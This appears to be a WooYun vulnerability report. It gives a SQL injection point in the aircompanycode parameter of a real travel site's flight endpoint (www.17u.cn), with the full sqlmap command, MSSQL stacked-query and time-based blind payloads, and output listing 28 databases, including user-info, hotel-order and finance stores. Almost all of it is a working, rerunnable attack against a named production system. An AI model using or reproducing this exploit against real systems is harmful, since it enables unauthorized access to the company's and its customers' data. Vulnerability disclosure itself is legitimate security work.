WooYun.org

注入点:www.17u.cn/flight/ajaxcn.ashx?aircompanycode=&descityid=0&desportcode=&maxperpage=5&orgcityid=0&orgportcode=&r=function%20getSeconds()%20{%20%20%20%20[native%20code]}&Type=getdpdata&typevalue=3

python sqlmap.py -u "www.17u.cn/flight/ajaxcn.ashx?aircompanycode=&descityid=0&desportcode=&maxperpage=5&orgcityid=0&orgportcode=&r=function%20getSeconds()%20{%20%20%20%20[native%20code]}&Type=getdpdata&typevalue=3" --user-agent="Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36" --batch --dbs
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: aircompanycode
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: aircompanycode='; WAITFOR DELAY '0:0:5'--&descityid=0&desportcode=&maxperpage=5&orgcityid=0&orgportcode=&r=function getSeconds() {    [native code]}&Type=getdpdata&typevalue=3
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: aircompanycode=' WAITFOR DELAY '0:0:5'--&descityid=0&desportcode=&maxperpage=5&orgcityid=0&orgportcode=&r=function getSeconds() {    [native code]}&Type=getdpdata&typevalue=3
available databases [28]:
[*] 17u_net
[*] 17uEbookingHistory
[*] IpData
[*] master
[*] model
[*] msdb
[*] TCB2cBlog
[*] TCB2cWenDa
[*] TCCar
[*] TCCline
[*] TCCLineResource
[*] TCEbook
[*] TCFly
[*] TCFlyUtility
[*] TCHotel
[*] TCHotelFinance
[*] TCHotelOrder
[*] TCHotelRedundant
[*] TCHotelResource
[*] TCMapBarData
[*] TCMapBarDataClass
[*] TCScenery
[*] TcSceneryParameter
[*] TcSceneryResource
[*] TCShare
[*] TCUserInfo
[*] TCWEB
[*] tempdb